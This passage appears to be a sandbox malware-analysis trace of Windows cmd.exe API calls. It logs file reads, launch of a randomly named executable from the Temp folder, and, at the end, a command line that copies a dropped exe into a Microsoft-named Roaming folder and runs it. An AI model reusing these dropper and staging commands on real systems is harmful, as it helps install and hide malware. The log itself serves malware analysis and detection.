dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.292] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, 
lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.293] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.294] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, 
lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.295] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.391] _close (_FileHandle=4) returned 0 [0094.391] FindNextFileW (in: hFindFile=0x230f58, lpFindFileData=0x20f510 | out: lpFindFileData=0x20f510) returned 0 [0094.392] GetLastError () returned 0x12 [0094.392] FindClose (in: hFindFile=0x230f58 | out: hFindFile=0x230f58) returned 1 [0094.392] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0094.394] _close (_FileHandle=3) returned 0 [0094.395] GetConsoleTitleW (in: lpConsoleTitle=0x20f9ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.395] GetFileAttributesW 
(lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe\"")) returned 0xffffffff [0094.395] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.395] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.395] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.395] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.395] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.395] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.395] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.395] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.395] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.395] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0094.395] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.395] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.395] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.395] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.395] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.395] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.395] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.395] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.395] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="VOL") 
returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.396] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.396] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.396] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.396] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.396] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.396] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.396] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.396] _wcsicmp 
(_String1="\"C", _String2="PROMPT") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.396] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.396] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.396] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.396] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.396] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0094.396] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.396] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.396] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.397] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.397] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.397] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.397] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.397] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.397] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.397] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.397] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.397] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.397] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.397] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.397] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.397] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0094.397] _wcsicmp (_String1="\"C", _String2="IF") 
returned -71 [0094.397] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0094.397] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.397] SetErrorMode (uMode=0x0) returned 0x0 [0094.397] SetErrorMode (uMode=0x1) returned 0x0 [0094.397] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x240498, lpFilePart=0x20f4cc | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x20f4cc*="Temp") returned 0x23 [0094.397] SetErrorMode (uMode=0x0) returned 0x1 [0094.397] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0094.398] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", fInfoLevelId=0x1, lpFindFileData=0x20f268, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f268) returned 0x230f58 [0094.400] FindClose (in: hFindFile=0x230f58 | out: hFindFile=0x230f58) returned 1 [0094.401] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0094.401] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0094.401] GetConsoleTitleW (in: lpConsoleTitle=0x20f740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.401] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f5c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f690 | out: lpAttributeList=0x20f5c8, lpSize=0x20f690) returned 1 [0094.401] UpdateProcThreadAttribute (in: lpAttributeList=0x20f5c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f688, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f5c8, lpPreviousValue=0x0) returned 1 [0094.401] GetStartupInfoW (in: lpStartupInfo=0x20f584 
| out: lpStartupInfo=0x20f584*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.401] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.402] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.402] lstrcmpW (lpString1="\\yAQb5Zg8.exe", lpString2="\\XCOPY.EXE") returned 1 [0094.402] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f624*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", 
dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f670 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessInformation=0x20f670*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb58, dwThreadId=0xb5c)) returned 1 [0095.644] CloseHandle (hObject=0x4c) returned 1 [0095.644] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0095.644] GetEnvironmentStringsW () returned 0x242ce0* [0095.644] FreeEnvironmentStringsW (penv=0x242ce0) returned 1 [0095.644] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0098.180] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f564 | out: lpExitCode=0x20f564*=0x0) returned 1 [0098.180] CloseHandle (hObject=0x50) returned 1 [0098.180] _vsnwprintf (in: _Buffer=0x20f6ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f570 | out: _Buffer="00000000") returned 8 [0098.180] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0098.180] GetEnvironmentStringsW () returned 0x2424c0* [0098.180] FreeEnvironmentStringsW (penv=0x2424c0) returned 1 [0098.180] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0098.180] GetEnvironmentStringsW () returned 0x2424c0* [0098.180] FreeEnvironmentStringsW (penv=0x2424c0) returned 1 [0098.180] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f5c8 | out: lpAttributeList=0x20f5c8) [0098.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.181] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.181] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0098.181] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0098.181] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0098.181] SetConsoleInputExeNameW () returned 0x1 [0098.181] GetConsoleOutputCP () returned 0x1b5 [0098.181] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.181] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.181] exit (_Code=0) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167c0" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 